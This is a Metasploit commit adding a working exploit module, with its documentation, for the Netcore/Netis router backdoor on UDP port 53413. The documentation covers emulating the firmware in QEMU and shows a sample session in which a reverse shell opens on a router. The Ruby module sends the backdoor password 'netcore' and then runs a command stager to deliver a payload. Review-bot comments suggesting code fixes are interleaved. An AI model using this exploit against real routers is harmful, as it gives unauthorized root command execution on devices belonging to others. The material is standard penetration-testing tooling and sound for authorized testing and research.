
Land #6880, add a module for netcore/netdis udp 53413 backdoor

wchen-r7 3 years ago
parent
commit
8654baf3dd

+ 94
- 0
documentation/modules/exploit/linux/misc/netcore_udp_53413_backdoor.md

@@ -0,0 +1,94 @@
1
+### Vulnerable Devices
2
+Trend Micro lists "almost all" models as being vulnerable in August 2014.
3
+
4
+Vulnerable AND Exploitable:
5
+
6
+1. Netcore NI360 second-generation
7
+ 
8
+Vulnerable, but not Exploitable via this module (details later):
9
+
10
+1. Netis WF2414 firmware V1.4.27001
11
+
12
+### Lab Emulation
13
+1. Install qemu
14
+2. Download and install mipsel.  Please read the [tutorial](https://people.debian.org/%7Eaurel32/qemu/mipsel/README.txt)
15
+3. Starts the mipsel lab
16
+ 1. `qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413`
17
+4. Put [vuln_squashfs-root.tar.gz](https://github.com/rapid7/metasploit-framework/files/267284/vuln_squashfs-root.tar.gz) to mipsel lab, extract it.
18
+ 1. `scp -P22222 vuln_squashfs-root.tar.gz root@127.0.0.1:/root`
19
+ 2. `tar xvf vuln_squashfs-root.tar.gz`
20
+5. Run vuln programs.
21
+ 1. `cd nw614 && chroot . /bin/igdmptd`
22
+
23
+## Verification Steps
24
+
25
+  1. Install the emulator/hardware
26
+  2. Start msfconsole
27
+  3. Do: `use exploits/linux/misc/netcore_udp_53413_backdoor`
28
+  4. Do: `set RHOST <ip>`
29
+  5. Do: `check`
30
+  6. Do: `exploit`
31
+  7. You should get a shell.
32
+
33
+## Exploitability
34
+
35
+As previously noted, some modules are vulnerable, but not currently exploitable via Metasploit.
36
+During [testing](https://github.com/rapid7/metasploit-framework/pull/6880#issuecomment-231597626) it was discovered that some modules implement an echo command that does not honor -ne.  While it may be possible to still execute a shell, further investigation would need to be conducted.
37
+In these cases, it should be possible to use [other scripts](https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py) to act as a fake interactive shell.
38
+
39
+## Scenarios
40
+
41
+The following is an example of a vulnerable AND EXPLOITABLE router.
42
+
43
+```
44
+use exploits/linux/misc/netcore_udp_53413_backdoor
45
+msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
46
+RHOST => 192.168.1.1
47
+msf exploit(netcore_udp_53413_backdoor) > check
48
+[+] The target is vulnerable.
49
+msf exploit(netcore_udp_53413_backdoor) > run
50
+
51
+[*] Started reverse TCP handler on 192.168.1.2:4444
52
+[*] Exploiting...
53
+[*] Command Stager progress -  12.54% done (196/1563 bytes)
54
+[*] Command Stager progress -  25.08% done (392/1563 bytes)
55
+[*] Command Stager progress -  37.62% done (588/1563 bytes)
56
+[*] Command Stager progress -  50.16% done (784/1563 bytes)
57
+[*] Command Stager progress -  62.70% done (980/1563 bytes)
58
+[*] Command Stager progress -  75.24% done (1176/1563 bytes)
59
+[*] Command Stager progress -  87.78% done (1372/1563 bytes)
60
+[*] Command Stager progress - 100.00% done (1563/1563 bytes)
61
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500
62
+
63
+pwd
64
+/
65
+ls
66
+bin
67
+cfg
68
+dev
69
+etc
70
+lib
71
+linuxrc
72
+log
73
+proc
74
+sbin
75
+sh
76
+sys
77
+tmp
78
+usr
79
+var
80
+web
81
+```
82
+
83
+The following is an example of a vulnerable but NOT expoitable router.
84
+
85
+```
86
+msf > use exploits/linux/misc/netcore_udp_53413_backdoor
87
+msf exploit(netcore_udp_53413_backdoor) > set rhost 192.168.1.1
88
+rhost => 192.168.1.1
89
+msf exploit(netcore_udp_53413_backdoor) > check
90
+
91
+[+] Backdoor Unlocked
92
+[*] Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.
93
+[*] The target service is running, but could not be validated.
94
+```
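Review bot: the Exploitability section says "some modules are vulnerable, but not currently exploitable" and "some modules implement an echo command" (hunk lines 35-36); both should read "models", since it is router models, not Metasploit modules, that differ. The same section says the echo does not honor `-ne`, while the module description says `-e` and the check actually sends `echo -en`; pick one spelling so the doc matches the code. Smaller points: "Starts the mipsel lab" and "Put ... to mipsel lab" read awkwardly ("Start the mipsel lab", "Copy ... to the mipsel lab"), "expoitable" in the Scenarios section is a typo, and the second scenario shows "[+] Backdoor Unlocked", which the module only prints via `vprint_good`, so either note that VERBOSE was set or drop that line from the sample output.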

+ 123
- 0
modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb

@@ -0,0 +1,123 @@
1
+##
2
+# This module requires Metasploit: http://metasploit.com/download
3
+# Current source: https://github.com/rapid7/metasploit-framework
4
+##
5
+
6
+require 'msf/core'
7
+
8
+class MetasploitModule < Msf::Exploit::Remote
9
+  Rank = NormalRanking
10
+
11
+  include Msf::Exploit::Remote::Udp
12
+  include Msf::Exploit::CmdStager
13
+
14
+  def initialize(info = {})
15
+    super(update_info(info,
16
+      'Name'            => 'Netcore Router Udp 53413 Backdoor',
17
+      'Description'     => %q{
18
+        Routers manufactured by Netcore, a popular brand for networking
19
+        equipment in China, have a wide-open backdoor that can be fairly
20
+        easily exploited by attackers. These products are also sold under
21
+        the Netis brand name outside of China. This backdoor allows
22
+        cyber criminals to easily run arbitrary code on these routers,
23
+        rendering it vulnerable as a security device.
24
+        Some models include a non-standard echo command which doesn't
25
+        honor -e, and are therefore not currently exploitable with
26
+        Metasploit.  See URLs or module markdown for additional options.
27
+      },
28
+      'Author'          =>
29
+        [
30
+          'Nixawk',
31
+          'h00die <mike@shorebreaksecurity.com>'
32
+        ],
33
+      'License'         => MSF_LICENSE,
34
+      'References'      =>
35
+        [
36
+          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-90227' ],
37
+          [ 'URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/' ],
38
+          [ 'URL', 'https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py']
39
+        ],
40
+      'Privileged'      => true,
41
+      'Targets'         =>
42
+        [
43
+          ['MIPS Little Endian',
44
+           {
45
+             'Platform' => 'linux',
46
+             'Arch'     => ARCH_MIPSLE
47
+           }
48
+          ],
49
+          ['MIPS Big Endian',
50
+           {
51
+             'Platform' => 'linux',
52
+             'Arch'     => ARCH_MIPSBE
53
+           }
54
+          ]
55
+        ],
56
+      'DefaultTarget'   => 0,
57
+      'DisclosureDate'  => 'Aug 25 2014'))
58
+
59
+    register_options(
60
+      [
61
+        OptInt.new('TIMEOUT', [true, 'The socket response timeout in milliseconds', 1000]),
62
+        Opt::RPORT(53413)
63
+      ], self.class)
64
+  end
65
+
66
+  def timeout
67
+    (datastore['TIMEOUT'] || 1000) / 1000.0
68
+  end
69
+
70
+  def send_command(data)
71
+    payload = "\x00" * 8
72
+    payload << data
73
+    udp_sock.put(payload)
74
+  end
75
+
76
+  def execute_command(cmd, _opts)
77
+    send_command(cmd)
78
+    vprint_status("Sending: #{cmd}")
79
+  end
80
+
81
+  def authenticate()
82
+    # netcore is the password to unlock the backdoor
83
+    send_command('netcore')
84
+    resp = udp_sock.get(timeout)
85
+    if resp.include?('Login succeeded!')
86
+      vprint_good('Backdoor Unlocked')
87
+    end
88
+  end
89
+
90
+  def check
91
+    connect_udp
92
+    authenticate
93
+    resp = []
94
+    tmp_file = Rex::Text.rand_text_alpha(5)
95
+    # we need to test the echo command to see if it plays nice
96
+    ["echo -en #{tmp_file} > /tmp/#{tmp_file}", "cat /tmp/#{tmp_file}"].each do |command|
97
+      send_command(command)
98
+      resp << udp_sock.get(timeout)
99
+    end
100
+    disconnect_udp
101
+    resp_str = resp.join(',')
102
+    # check if we got a good response back
103
+    if resp.length >= 1 && resp_str.include?("\x00\x00\x00\x05") && resp_str.include?(tmp_file)
104
+      # some routers have a non-standard echo which doesn't support -en, so we need to detect that
105
+      if resp_str.include?('en ')
106
+        print_status('Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.')
107
+        Exploit::CheckCode::Detected
108
+      else
109
+        Exploit::CheckCode::Vulnerable
110
+      end
111
+    else
112
+      Exploit::CheckCode::Safe
113
+    end
114
+  end
115
+
116
+  def exploit
117
+    print_status('Exploiting...')
118
+    connect_udp
119
+    authenticate
120
+    execute_cmdstager(:flavor => :echo, :linemax => 200)
121
+    disconnect_udp
122
+  end
123
+end
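Review bot: `authenticate` never reports failure: when the response lacks "Login succeeded!" it silently returns and both `check` and `exploit` go on to send commands as if the backdoor were unlocked. Have it return a boolean (`resp.include?('Login succeeded!')`), return `Exploit::CheckCode::Safe` from `check` when it is false, and in `exploit` call `fail_with(Failure::NoAccess, 'Backdoor did not unlock')`. Two smaller points in `check`: `resp.length >= 1` is always true because two responses are pushed unconditionally, and the `resp_str.include?('en ')` test for the non-standard echo would be clearer and less fragile as `resp_str.include?("-en #{tmp_file}")`, which is the exact content a non-honoring echo writes to the file. The file written to `/tmp/#{tmp_file}` is also never removed; consider sending `rm -f /tmp/#{tmp_file}` before `disconnect_udp`.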
